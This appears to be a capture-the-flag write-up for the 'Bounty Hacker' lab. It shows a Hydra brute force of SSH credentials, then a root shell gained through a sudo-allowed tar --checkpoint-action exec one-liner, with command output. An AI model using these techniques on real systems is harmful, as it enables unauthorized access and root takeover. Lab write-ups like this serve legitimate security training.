Skip to main content

Bounty Hacker

HYDRA

  • We were able to Brute-Force the credentials of the User: lin
  • Brute-Forcing SSH: RedDr4gonSynd1cat3
[DATA] attacking ssh://10.10.21.169:22/
[22][ssh] host: 10.10.21.169 login: lin password: RedDr4gonSynd1cat3


Privilege Escalation

  • Using SSH Credentials to Login: lin:RedDr4gonSynd1cat3
lin@bountyhacker:~/Desktop$ id
uid=1001(lin) gid=1001(lin) groups=1001(lin)

  • The User lin can run: /bin/tar as ROOT
lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
(root) /bin/tar

  • Using tar to Escalate Privileges.
lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
root@bountyhacker:~/Desktop$ id
uid=0(root) gid=0(root) groups=0(root)